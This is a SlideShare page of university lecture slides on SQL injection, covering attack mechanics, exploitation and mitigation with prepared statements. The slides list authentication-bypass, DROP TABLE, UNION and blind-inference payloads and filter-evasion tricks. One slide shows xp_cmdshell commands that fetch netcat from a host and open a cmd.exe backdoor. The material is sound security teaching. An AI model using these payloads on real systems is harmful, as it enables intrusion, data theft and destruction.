SlideShare ist ein Scribd-Unternehmen logo

Sql injection

Als PPT, PDF herunterladen
Nitish Kumar
Nitish Kumar
Technologie
1 von 37
SQL INJECTION CPSC 4670
Topics 1. What are injection attacks? 2. How SQL Injection Works 3. Exploiting SQL Injection Bugs 4. Mitigating SQL Injection 5. Other Injection Attacks
Injection  Injection attacks trick an application into including unintended commands in the data send to an interpreter.  Interpreters  Interpret strings as commands.  Ex: SQL, shell (cmd.exe, bash), LDAP, XPath  Key Idea  Input data from the application is executed as code by the interpreter.
SQL Injection 1. App sends form to user. 2. Attacker submits form with SQL exploit data. 3. Application builds string with exploit data. 4. Application sends SQL query to DB. 5. DB executes query, including exploit, sends data back to application. 6. Application returns data to user. Web Server Attacker DB Server Firewall User Pass ‘ or 1=1-- Form
SQL Injection in PHP $link = mysql_connect($DB_HOST, $DB_USERNAME, $DB_PASSWORD) or die ("Couldn't connect: " . mysql_error()); mysql_select_db($DB_DATABASE); $query = "select count(*) from users where username = '$username' and password = '$password‘ "; $result = mysql_query($query);
SQL Injection Attack #1 Unauthorized Access Attempt: password = ’ or1=1 -- SQL statement becomes: select count(* ) from use rs where use rnam e = ‘use r’ and passwo rd = ‘’ or1=1 -- Checks if password is empty OR 1=1, which is always true, permitting access.
SQL Injection Attack #2 Database Modification Attack: password = foo’; delete fromtable use rs where use rnam e like ‘% DB executes two SQL statements: select count(* ) fromuse rs where use rnam e = ‘use r’ and passwo rd = ‘fo o ’ delete fromtable use rs where use rnam e like ‘%’
Exploits of a Mom
Finding SQL Injection Bugs 1. Submit a single quote as input. If an error results, app is vulnerable. If no error, check for any output changes. 1. Submit two single quotes. Databases use ’’ to represent literal ’ If error disappears, app is vulnerable. 1. Try string or numeric operators.  Oracle: ’||’FOO  MS-SQL: ‘+’FOO  MySQL: ’ ’FOO  2-2  81+19  49-ASCII(1)
Injecting into SELECT Most common SQL entry point. SELECT columns FROM table WHERE expression ORDER BY expression Places where user input is inserted: WHERE expression ORDER BY expression Table or column names
Injecting into INSERT Creates a new data row in a table. INSERT INTO table (col1, col2, ...) VALUES (val1, val2, ...) Requirements Number of values must match # columns. Types of values must match column types. Technique: add values until no error. foo’)-- foo’, 1)-- foo’, 1, 1)--
Injecting into UPDATE Modifies one or more rows of data. UPDATE table SET col1=val1, col2=val2, ... WHERE expression Places where input is inserted SET clause WHERE clause Be careful with WHERE clause ’ OR 1=1 will change all rows
UNION Combines SELECTs into one result. SELECT cols FROM table WHERE expr UNION SELECT cols2 FROM table2 WHERE expr2 Allows attacker to read any table foo’ UNION SELECT number FROM cc-- Requirements Results must have same number and type of cols. Attacker needs to know name of other table. DB returns results with column names of 1st query.
UNION Finding #columns with NULL ‘ UNION SELECT NULL-- ‘ UNION SELECT NULL, NULL-- ‘ UNION SELECT NULL, NULL, NULL-- Finding #columns with ORDER BY ‘ ORDER BY 1-- ‘ ORDER BY 2-- ‘ ORDER BY 3-- Finding a string column to extract data ‘ UNION SELECT ‘a’, NULL, NULL— ‘ UNION SELECT NULL, ‘a’, NULL-- ‘ UNION SELECT NULL, NULL, ‘a’--
Inference Attacks Problem: What if app doesn’t print data? Injection can produce detectable behavior Successful or failed web page. Noticeable time delay or absence of delay. Identify an exploitable URL http://site/blog?message=5 AND 1=1 http://site/blog?message=5 AND 1=2 Use condition to identify one piece of data (SUBSTRING(SELECT TOP 1 number FROM cc), 1, 1) = 1 (SUBSTRING(SELECT TOP 1 number FROM cc), 1, 1) = 2 ... or use binary search technique ... (SUBSTRING(SELECT TOP 1 number FROM cc), 1, 1) > 5
More Examples (1)  Application authentication bypass using SQL injection.  Suppose a web form takes userID and password as input.  The application receives a user ID and a password and authenticate the user by checking the existence of the user in the USER table and matching the data in the PWD column.  Assume that the application is not validating what the user types into these two fields and the SQL statement is created by string concatenation.
More Example (2)  The following code could be an example of such bad practice: sqlString = “select USERID from USER where USERID = `” & userId & “` and PWD = `” & pwd & “`” result = GetQueryResult(sqlString) If(result = “”) then userHasBeenAuthenticated = False Else userHasBeenAuthenticated = True End If
More Example (3)  User ID: ` OR ``=`  Password: `OR ``=`  In this case the sqlString used to create the result set would be as follows: select USERID from USER where USERID = ``OR``=``and PWD = `` OR``=`` select USERID from USER where USERID = ``OR``=``and PWD = `` OR``=`` TRUE TRUE  Which would certainly set the userHasBenAuthenticated variable to true.
More Example (4) User ID: ` OR ``=`` -- Password: abc Because anything after the -- will be ignore, the injection will work even without any specific injection into the password predicate.
More Example (5) User ID: ` ; DROP TABLE USER ; -- Password: `OR ``=` select USERID from USER where USERID = `` ; DROP TABLE USER ; -- ` and PWD = ``OR ``=`` I will not try to get any information, I just wan to bring the application down.
Beyond Data Retrieval Microsoft's SQL Server supports a stored procedure xp_cmdshell that permits what amounts to arbitrary command execution, and if this is permitted to the web user, complete compromise of the webserver is inevitable. What we had done so far was limited to the web application and the underlying database, but if we can run commands, the webserver itself cannot help but be compromised. Access to xp_cmdshell is usually limited to administrative accounts, but it's possible to grant it to lesser users. With the UTL_TCP package and its procedures and functions, PL/SQL applications can communicate with external TCP/IP-based servers using TCP/IP. Because many Internet application protocols are based on TCP/IP, this package is useful to PL/SQL applications that use Internet protocols and e-mail.
Beyond Data Retrieval Downloading Files exec master..xp_cmdshell ‘tftp 192.168.1.1 GET nc.exe c:nc.exe’ Backdoor with Netcat exec master..xp_cmdshell ‘nc.exe -e cmd.exe -l -p 53’ Direct Backdoor w/o External Cmds UTL_TCP.OPEN_CONNECTION('192.168.0.1', 2222, 1521) //charset: 1521 //port: 2222 //host: 192.168.0.1
Impact of SQL Injection 1. Leakage of sensitive information. 2. Reputation decline. 3. Modification of sensitive information. 4. Loss of control of db server. 5. Data loss. 6. Denial of service.
The Cause: String Building Building a SQL command string with user input in any language is dangerous. • Variable interpolation. • String concatenation with variables. • String format functions like sprintf(). • String templating with variable replacement.
Mitigating SQL Injection Ineffective Mitigations Blacklists Stored Procedures Partially Effective Mitigations Whitelists Prepared Queries
Blacklists Filter out or Sanitize known bad SQL meta- characters, such as single quotes. Problems: 1. Numeric parameters don’t use quotes. 2. URL escaped metacharacters. 3. Unicode encoded metacharacters. 4. Did you miss any metacharacters? Though it's easy to point out some dangerous characters, it's harder to point to all of them.
Bypassing Filters Different case SeLecT instead of SELECT or select Bypass keyword removal filters SELSELECTECT URL-encoding %53%45%4C%45%43%54 SQL comments SELECT/*foo*/num/*foo*/FROM/**/cc SEL/*foo*/ECT String Building ‘us’||’er’ chr(117)||chr(115)||chr(101)||chr(114)
Stored Procedures Stored Procedures build strings too: CREATE PROCEDURE dbo.doQuery(@id nchar(128)) AS DECLARE @query nchar(256) SELECT @query = ‘SELECT cc FROM cust WHERE id=‘’’ + @id + ‘’’’ EXEC @query RETURN it's always possible to write a stored procedure that itself constructs a query dynamically: this provides no protection against SQL Injection. It's only proper binding with prepare/execute or direct SQL statements with bound variables that provide protection.
Whitelist Reject input that doesn’t match your list of safe characters to accept.  Identify what is good, not what is bad.  Reject input instead of attempting to repair.  Still have to deal with single quotes when required, such as in names.
Prepared Queries  bound parameters, which are supported by essentially all database programming interfaces. In this technique, an SQL statement string is created with placeholders - a question mark for each parameter - and it's compiled ("prepared", in SQL parlance) into an internal form. Later, this prepared query is "executed" with a list of parameters.Example in Perl: $sth = $dbh->prepare("SELECT email, userid FROM members WHERE email = ?;"); $sth->execute($email); $email is the data obtained from the user's form, and it is passed as positional parameter #1 (the first question mark), and at no point do the contents of this variable have anything to do with SQL statement parsing. Quotes, semicolons, backslashes, SQL comment notation - none of this has any impact, because it's "just data". There simply is nothing to subvert, so the application is be largely immune to SQL injection attacks.
Prepared Queries  bound parameters in Java Insecure version Statement s = connection.createStatement(); ResultSet rs = s.executeQuery("SELECT email FROM member WHERE name = " + formField); // *boom* Secure version PreparedStatement ps = connection.prepareStatement( "SELECT email FROM member WHERE name = ?"); ps.setString(1, formField); ResultSet rs = ps.executeQuery(); There also may be some performance benefits if this prepared query is reused multiple times (it only has to be parsed once), but this is minor compared to the enormous security benefits. This is probably the single most important step one can take to secure a web application.
References:http://devzone.zend.com/article/686 http://unixwiz.net/techtips/sql-injection.html ?php $mysqli = new mysqli('localhost', 'user', 'password', 'world'); /* check connection */ if (mysqli_connect_errno()) { printf(Connect failed: %sn, mysqli_connect_error()); exit(); } $stmt = $mysqli-prepare(INSERT INTO CountryLanguage VALUES (?, ?, ?, ?)); $stmt-bind_param('sssd', $code, $language, $official, $percent); // ‘sssd’ specifies format $code = 'DEU'; $language = 'Bavarian'; $official = F; $percent = 11.2; /* execute prepared statement */ $stmt-execute(); printf(%d Row inserted.n, $stmt-affected_rows); /* close statement and connection */ $stmt-close(); /* Clean up table CountryLanguage */ $mysqli-query(DELETE FROM CountryLanguage WHERE Language='Bavarian'); printf(%d Row deleted.n, $mysqli-affected_rows); /* close connection */ $mysqli-close(); ? Prepared Queries
Other Injection Types  Shell injection.  Scripting language injection.  File inclusion.  XML injection.  XPath injection.  LDAP injection.  SMTP injection.
SQL injection Conclusion  SQL injection is technique for exploiting applications that use relational databases as their back end.  Applications compose SQL statements and send to database.  SQL injection use the fact that many of these applications concatenate the fixed part of SQL statement with user-supplied data that forms WHERE predicates or additional sub-queries.
SQL injection Conclusion  The technique is based on malformed user- supplied data  Transform the innocent SQL calls to a malicious call  Cause unauthorized access, deletion of data, or theft of information  All databases can be a target of SQL injection and all are vulnerable to this technique.  The vulnerability is in the application layer outside of the database, and the moment that the application has a connection into the database.
Project 7: Due on April 25  Visit the website for information about webGoat: http://www.irongeek.com/i.php?page=videos/webgoat-sql-injection  Read WebGoad User and Install Guide http://www.owasp.org/index.php/Category:OWASP_WebGoat_Project  Install WebGoat and play with SQL injection.
References 1. Andres Andreu, Pro fe ssio nalPe n Te sting fo r We b Applicatio ns , Wrox, 2006. 2. Chris Anley, “Advanced SQL Injection In SQL Server Applications,” http://www.nextgenss.com/papers/advanced_sql_injection.pdf, 2002. 3. Stephen J. Friedl, “SQL Injection Attacks by Example,” http://www.unixwiz.net/techtips/sql- injection.html, 2005. 4. Ferruh Mavituna, SQL Injection Cheat Sheet, http://ferruh.mavituna.com/sql-injection- cheatsheet-oku 5. J.D. Meier, et. al., Im pro ving We b Applicatio n Se curity: Thre ats and Co unte rm e asure s , Microsoft, http://msdn2.microsoft.com/en-us/library/aa302418.aspx, 2006. 6. Randall Munroe, XKCD, http://xkcd.com/327/ 7. OWASP, OWASP Testing Guide v2, http://www.owasp.org/index.php/Testing_for_SQL_Injection, 2007. 8. Joel Scambray, Mike Shema, and Caleb Sima, Hacking Expo se d: We b Applicatio ns, 2nd e ditio n, Addison-Wesley, 2006. 9. SEMS, “SQL Injection used to hack Real Estate Web Sites,” http://www.semspot.com/2007/12/19/sql-injection-used-to-hack-real-estate-websites- extreme-blackhat/, 2007. 10. Chris Shiflett, Esse ntialPHP Se curity, O’Reilly, 2005. 11. SK, “SQL Injection Walkthrough,” http://www.securiteam.com/securityreviews/5DP0N1P76E.html, 2002. 12. SPI Labs, “Blind SQL Injection,” http://sqlinjection.com/assets/documents/Blind_SQLInjection.pdf, 2007. 13. Dafydd Stuttard and Marcus Pinto, We b Applicatio n Hacke r’s Handbo o k, Wiley, 2007. 14. WASC, “Web Application Incidents Annual Report 2007,” https://bsn.breach.com/downloads/whid/The%20Web%20Hacking%20Incidents %20Database%20Annual%20Report%202007.pdf, 2008.

Empfohlen

Sql injection
Sql injectionSql injection
Sql injection
Hemendra Kumar
 
Ppt on sql injection
Ppt on sql injectionPpt on sql injection
Ppt on sql injection
ashish20012
 
Sql injection
Sql injectionSql injection
Sql injection
Zidh
 
SQL injection prevention techniques
SQL injection prevention techniquesSQL injection prevention techniques
SQL injection prevention techniques
SongchaiDuangpan
 
SQL Injections (Part 1)
SQL Injections (Part 1)SQL Injections (Part 1)
SQL Injections (Part 1)
n|u - The Open Security Community
 
Sql injection attack
Sql injection attackSql injection attack
Sql injection attack
RajKumar Rampelli
 
SQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint PresentationSQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint Presentation
Rapid Purple
 
SQL Injection
SQL InjectionSQL Injection
SQL Injection
Asish Kumar Rath
 

Empfohlen

Sql injection
Sql injectionSql injection
Sql injection
Hemendra Kumar
 
Ppt on sql injection
Ppt on sql injectionPpt on sql injection
Ppt on sql injection
ashish20012
 
Sql injection
Sql injectionSql injection
Sql injection
Zidh
 
SQL injection prevention techniques
SQL injection prevention techniquesSQL injection prevention techniques
SQL injection prevention techniques
SongchaiDuangpan
 
SQL Injections (Part 1)
SQL Injections (Part 1)SQL Injections (Part 1)
SQL Injections (Part 1)
n|u - The Open Security Community
 
Sql injection attack
Sql injection attackSql injection attack
Sql injection attack
RajKumar Rampelli
 
SQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint PresentationSQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint Presentation
Rapid Purple
 
SQL Injection
SQL InjectionSQL Injection
SQL Injection
Asish Kumar Rath
 
Sql Injection attacks and prevention
Sql Injection attacks and preventionSql Injection attacks and prevention
Sql Injection attacks and prevention
helloanand
 
Sql injection in cybersecurity
Sql injection in cybersecuritySql injection in cybersecurity
Sql injection in cybersecurity
Sanad Bhowmik
 
A Brief Introduction in SQL Injection
A Brief Introduction in SQL InjectionA Brief Introduction in SQL Injection
A Brief Introduction in SQL Injection
Sina Manavi
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTION
Mentorcs
 
Sql injection
Sql injectionSql injection
Sql injection
Nikunj Dhameliya
 
Sql injection attack
Sql injection attackSql injection attack
Sql injection attack
Raghav Bisht
 
Sql injections - with example
Sql injections - with exampleSql injections - with example
Sql injections - with example
Prateek Chauhan
 
SQL Injection
SQL Injection SQL Injection
SQL Injection
Adhoura Academy
 
Sql injection
Sql injectionSql injection
Sql injection
Pallavi Biswas
 
How to identify and prevent SQL injection
How to identify and prevent SQL injection How to identify and prevent SQL injection
How to identify and prevent SQL injection
Eguardian Global Services
 
Types of sql injection attacks
Types of sql injection attacksTypes of sql injection attacks
Types of sql injection attacks
Respa Peter
 
Sql injection
Sql injectionSql injection
Sql injection
Sasha-Leigh Garret
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTION
Anoop T
 
Whatis SQL Injection.pptx
Whatis SQL Injection.pptxWhatis SQL Injection.pptx
Whatis SQL Injection.pptx
Simplilearn
 
Sql injection - security testing
Sql injection - security testingSql injection - security testing
Sql injection - security testing
Napendra Singh
 
Sql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySql Injection - Vulnerability and Security
Sql Injection - Vulnerability and Security
Sandip Chaudhari
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applications
Niyas Nazar
 
SQL injection
SQL injectionSQL injection
SQL injection
Raj Parmar
 
Sql injection
Sql injectionSql injection
Sql injection
Nuruzzaman Milon
 
Secure Code Warrior - CRLF injection
Secure Code Warrior - CRLF injectionSecure Code Warrior - CRLF injection
Secure Code Warrior - CRLF injection
Secure Code Warrior
 
Attques web
Attques webAttques web
Attques web
Tarek MOHAMED
 
Website attack n defacement n its control measures
Website attack n defacement n its control measures Website attack n defacement n its control measures
Website attack n defacement n its control measures
أحلام انصارى
 

Weitere ähnliche Inhalte

Was ist angesagt?

A Brief Introduction in SQL Injection
A Brief Introduction in SQL InjectionA Brief Introduction in SQL Injection
A Brief Introduction in SQL Injection
Sina Manavi
 

Was ist angesagt? (20)

Sql Injection attacks and prevention
Sql Injection attacks and preventionSql Injection attacks and prevention
Sql Injection attacks and prevention
 
Sql injection in cybersecurity
Sql injection in cybersecuritySql injection in cybersecurity
Sql injection in cybersecurity
 
A Brief Introduction in SQL Injection
A Brief Introduction in SQL InjectionA Brief Introduction in SQL Injection
A Brief Introduction in SQL Injection
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTION
 
Sql injection
Sql injectionSql injection
Sql injection
 
Sql injection attack
Sql injection attackSql injection attack
Sql injection attack
 
Sql injections - with example
Sql injections - with exampleSql injections - with example
Sql injections - with example
 
SQL Injection
SQL Injection SQL Injection
SQL Injection
 
Sql injection
Sql injectionSql injection
Sql injection
 
How to identify and prevent SQL injection
How to identify and prevent SQL injection How to identify and prevent SQL injection
How to identify and prevent SQL injection
 
Types of sql injection attacks
Types of sql injection attacksTypes of sql injection attacks
Types of sql injection attacks
 
Sql injection
Sql injectionSql injection
Sql injection
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTION
 
Whatis SQL Injection.pptx
Whatis SQL Injection.pptxWhatis SQL Injection.pptx
Whatis SQL Injection.pptx
 
Sql injection - security testing
Sql injection - security testingSql injection - security testing
Sql injection - security testing
 
Sql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySql Injection - Vulnerability and Security
Sql Injection - Vulnerability and Security
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applications
 
SQL injection
SQL injectionSQL injection
SQL injection
 
Sql injection
Sql injectionSql injection
Sql injection
 
Secure Code Warrior - CRLF injection
Secure Code Warrior - CRLF injectionSecure Code Warrior - CRLF injection
Secure Code Warrior - CRLF injection
 

Andere mochten auch

Website attack n defacement n its control measures
Website attack n defacement n its control measures Website attack n defacement n its control measures
Website attack n defacement n its control measures
أحلام انصارى
 
Introduction to SQL Injection
Introduction to SQL InjectionIntroduction to SQL Injection
Introduction to SQL Injection
jpubal
 
Devouring Security XML Attack surface and Defences
Devouring Security XML Attack surface and DefencesDevouring Security XML Attack surface and Defences
Devouring Security XML Attack surface and Defences
gmaran23
 
Sql injection attack_analysis_py_vo
Sql injection attack_analysis_py_voSql injection attack_analysis_py_vo
Sql injection attack_analysis_py_vo
Jirka Vejrazka
 
Sql injection attacks
Sql injection attacksSql injection attacks
Sql injection attacks
Nitish Kumar
 
Sql Injection Attacks And Defense Presentatio (1)
Sql Injection Attacks And Defense Presentatio (1)Sql Injection Attacks And Defense Presentatio (1)
Sql Injection Attacks And Defense Presentatio (1)
guest32e5cfe
 

Andere mochten auch (16)

Attques web
Attques webAttques web
Attques web
 
Website attack n defacement n its control measures
Website attack n defacement n its control measures Website attack n defacement n its control measures
Website attack n defacement n its control measures
 
Prevention of SQL Injection Attacks having XML Database
Prevention of SQL Injection Attacks having XML DatabasePrevention of SQL Injection Attacks having XML Database
Prevention of SQL Injection Attacks having XML Database
 
Introduction to SQL Injection
Introduction to SQL InjectionIntroduction to SQL Injection
Introduction to SQL Injection
 
Devouring Security XML Attack surface and Defences
Devouring Security XML Attack surface and DefencesDevouring Security XML Attack surface and Defences
Devouring Security XML Attack surface and Defences
 
Sql injection attack_analysis_py_vo
Sql injection attack_analysis_py_voSql injection attack_analysis_py_vo
Sql injection attack_analysis_py_vo
 
Sql injection attacks
Sql injection attacksSql injection attacks
Sql injection attacks
 
Protecting your data from SQL Injection attacks
Protecting your data from SQL Injection attacksProtecting your data from SQL Injection attacks
Protecting your data from SQL Injection attacks
 
Sql Injection Attacks And Defense Presentatio (1)
Sql Injection Attacks And Defense Presentatio (1)Sql Injection Attacks And Defense Presentatio (1)
Sql Injection Attacks And Defense Presentatio (1)
 
SQL Injection Attacks cs586
SQL Injection Attacks cs586SQL Injection Attacks cs586
SQL Injection Attacks cs586
 
Sql Injection Attacks Siddhesh
Sql Injection Attacks SiddheshSql Injection Attacks Siddhesh
Sql Injection Attacks Siddhesh
 
Vulnerable Active Record: A tale of SQL Injection in PHP Framework
Vulnerable Active Record: A tale of SQL Injection in PHP FrameworkVulnerable Active Record: A tale of SQL Injection in PHP Framework
Vulnerable Active Record: A tale of SQL Injection in PHP Framework
 
Security Misconfiguration (OWASP Top 10 - 2013 - A5)
Security Misconfiguration (OWASP Top 10 - 2013 - A5)Security Misconfiguration (OWASP Top 10 - 2013 - A5)
Security Misconfiguration (OWASP Top 10 - 2013 - A5)
 
Advanced SQL Injection: Attacks
Advanced SQL Injection: Attacks Advanced SQL Injection: Attacks
Advanced SQL Injection: Attacks
 
Understanding and preventing sql injection attacks
Understanding and preventing sql injection attacksUnderstanding and preventing sql injection attacks
Understanding and preventing sql injection attacks
 
A8 cross site request forgery (csrf) it 6873 presentation
A8 cross site request forgery (csrf) it 6873 presentationA8 cross site request forgery (csrf) it 6873 presentation
A8 cross site request forgery (csrf) it 6873 presentation
 

Ähnlich wie Sql injection

Sql Injection and Entity Frameworks
Sql Injection and Entity FrameworksSql Injection and Entity Frameworks
Sql Injection and Entity Frameworks
Rich Helton
 
Sql Injection Adv Owasp
Sql Injection Adv OwaspSql Injection Adv Owasp
Sql Injection Adv Owasp
Aung Khant
 

Ähnlich wie Sql injection (20)

Chapter 14 sql injection
Chapter 14 sql injectionChapter 14 sql injection
Chapter 14 sql injection
 
Sql injection
Sql injectionSql injection
Sql injection
 
03. sql and other injection module v17
03. sql and other injection module v1703. sql and other injection module v17
03. sql and other injection module v17
 
ShmooCon 2009 - (Re)Playing(Blind)Sql
ShmooCon 2009 - (Re)Playing(Blind)SqlShmooCon 2009 - (Re)Playing(Blind)Sql
ShmooCon 2009 - (Re)Playing(Blind)Sql
 
Sql Injection and Entity Frameworks
Sql Injection and Entity FrameworksSql Injection and Entity Frameworks
Sql Injection and Entity Frameworks
 
Web application security
Web application securityWeb application security
Web application security
 
Sq linjection
Sq linjectionSq linjection
Sq linjection
 
Advanced SQL Injection
Advanced SQL InjectionAdvanced SQL Injection
Advanced SQL Injection
 
Sql Injection Adv Owasp
Sql Injection Adv OwaspSql Injection Adv Owasp
Sql Injection Adv Owasp
 
Asp
AspAsp
Asp
 
SQL Injection
SQL InjectionSQL Injection
SQL Injection
 
Asegúr@IT IV - Remote File Downloading
Asegúr@IT IV - Remote File DownloadingAsegúr@IT IV - Remote File Downloading
Asegúr@IT IV - Remote File Downloading
 
DEFCON 23 - Lance buttars Nemus - sql injection on lamp
DEFCON 23 - Lance buttars Nemus - sql injection on lampDEFCON 23 - Lance buttars Nemus - sql injection on lamp
DEFCON 23 - Lance buttars Nemus - sql injection on lamp
 
Greensql2007
Greensql2007Greensql2007
Greensql2007
 
Code injection and green sql
Code injection and green sqlCode injection and green sql
Code injection and green sql
 
[Www.pkbulk.blogspot.com]dbms07
[Www.pkbulk.blogspot.com]dbms07[Www.pkbulk.blogspot.com]dbms07
[Www.pkbulk.blogspot.com]dbms07
 
Hackers Paradise SQL Injection Attacks
Hackers Paradise SQL Injection AttacksHackers Paradise SQL Injection Attacks
Hackers Paradise SQL Injection Attacks
 
Advanced Topics On Sql Injection Protection
Advanced Topics On Sql Injection ProtectionAdvanced Topics On Sql Injection Protection
Advanced Topics On Sql Injection Protection
 
Playing With (B)Sqli
Playing With (B)SqliPlaying With (B)Sqli
Playing With (B)Sqli
 
Time-Based Blind SQL Injection using Heavy Queries
Time-Based Blind SQL Injection using Heavy QueriesTime-Based Blind SQL Injection using Heavy Queries
Time-Based Blind SQL Injection using Heavy Queries
 

Kürzlich hochgeladen

+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
?#DUbAI#??##{{(☎️+971_581248768%)**%*]'#abortion pills for sale in dubai@
 
Architecting Cloud Native Applications
Architecting Cloud Native ApplicationsArchitecting Cloud Native Applications
Architecting Cloud Native Applications
WSO2
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Safe Software
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc
 

Kürzlich hochgeladen (20)

Understanding the FAA Part 107 License ..
Understanding the FAA Part 107 License ..Understanding the FAA Part 107 License ..
Understanding the FAA Part 107 License ..
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : Uncertainty
 
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of Terraform
 
MS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectorsMS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectors
 
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodPolkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
 
Architecting Cloud Native Applications
Architecting Cloud Native ApplicationsArchitecting Cloud Native Applications
Architecting Cloud Native Applications
 
WSO2's API Vision: Unifying Control, Empowering Developers
WSO2's API Vision: Unifying Control, Empowering DevelopersWSO2's API Vision: Unifying Control, Empowering Developers
WSO2's API Vision: Unifying Control, Empowering Developers
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
Exploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with MilvusExploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with Milvus
 
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingRepurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
 
ICT role in 21st century education and its challenges
ICT role in 21st century education and its challengesICT role in 21st century education and its challenges
ICT role in 21st century education and its challenges
 
[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf
 
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
 
Platformless Horizons for Digital Adaptability
Platformless Horizons for Digital AdaptabilityPlatformless Horizons for Digital Adaptability
Platformless Horizons for Digital Adaptability
 
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWEREMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 

Sql injection

  • 2. Topics 1. What are injection attacks? 2. How SQL Injection Works 3. Exploiting SQL Injection Bugs 4. Mitigating SQL Injection 5. Other Injection Attacks
  • 3. Injection  Injection attacks trick an application into including unintended commands in the data send to an interpreter.  Interpreters  Interpret strings as commands.  Ex: SQL, shell (cmd.exe, bash), LDAP, XPath  Key Idea  Input data from the application is executed as code by the interpreter.
  • 4. SQL Injection 1. App sends form to user. 2. Attacker submits form with SQL exploit data. 3. Application builds string with exploit data. 4. Application sends SQL query to DB. 5. DB executes query, including exploit, sends data back to application. 6. Application returns data to user. Web Server Attacker DB Server Firewall User Pass ‘ or 1=1-- Form
  • 5. SQL Injection in PHP $link = mysql_connect($DB_HOST, $DB_USERNAME, $DB_PASSWORD) or die ("Couldn't connect: " . mysql_error()); mysql_select_db($DB_DATABASE); $query = "select count(*) from users where username = '$username' and password = '$password‘ "; $result = mysql_query($query);
  • 6. SQL Injection Attack #1 Unauthorized Access Attempt: password = ’ or1=1 -- SQL statement becomes: select count(* ) from use rs where use rnam e = ‘use r’ and passwo rd = ‘’ or1=1 -- Checks if password is empty OR 1=1, which is always true, permitting access.
